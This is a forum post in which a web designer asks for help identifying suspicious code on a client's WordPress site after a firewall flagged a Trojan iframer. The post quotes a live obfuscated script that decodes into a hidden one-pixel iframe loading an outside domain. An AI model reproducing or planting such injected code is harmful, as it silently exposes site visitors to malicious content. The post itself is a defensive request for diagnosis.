Anyone recognise this, some kind of script code?
Hope someone can help and sorry if this is the wrong forum to post about this in, wasn't sure which to use.
Please bear with me as this is slightly above my expertise level.
A client of mine can't get into her WP dashboard or site because her Firewall showed a HEUR:Trojan.Script.Iframer error, I have been seeing what I kind find out about it and if I can help her or not (its looking like I will have to tell her to go to her host for help on this one). But before I do that, I have been deactivating plugins and changing themes and then viewing the source code.
From research I have done it looks like this might be a false positive but I am not sure. The only think I know of that is using an iframe is a recent "All Posters" advert we put on there. So I have got rid of that..
Before getting rid of it, this was at the bottom of the page via viewing the source code:
And after getting rid of the Iframe advert, it is still there, it comes after the closing < div > tag every time...
Does anyone recognise what this might be?
And do you have any other suggestions, advise?
Thanks so much
Sue
PS I tried putting in a line break in the above code to stop the posting area being too wide, there is no line break in the original code
Please bear with me as this is slightly above my expertise level.
A client of mine can't get into her WP dashboard or site because her Firewall showed a HEUR:Trojan.Script.Iframer error, I have been seeing what I kind find out about it and if I can help her or not (its looking like I will have to tell her to go to her host for help on this one). But before I do that, I have been deactivating plugins and changing themes and then viewing the source code.
From research I have done it looks like this might be a false positive but I am not sure. The only think I know of that is using an iframe is a recent "All Posters" advert we put on there. So I have got rid of that..
Before getting rid of it, this was at the bottom of the page via viewing the source code:
HTML Code:
</div> <script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,98,105,116,115,34,59,118,97,114,32, 119,61,34,105,110,102,111,34,59,118,97,114,32,114,101,54,61,34,119,97,114,101,46,34,59,118,97,114,32,114,114,116,116,54,61,34,110,101,116,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,61,48,49,48,48,48,49,48,49,48,48,49,49))</script>
Does anyone recognise what this might be?
And do you have any other suggestions, advise?
Thanks so much
Sue
PS I tried putting in a line break in the above code to stop the posting area being too wide, there is no line break in the original code
Find me on Pinterest: PINTEREST
You're welcome to follow me on Twitter - affiliatetips and Johnr_Collins
Find me on Pinterest: PINTEREST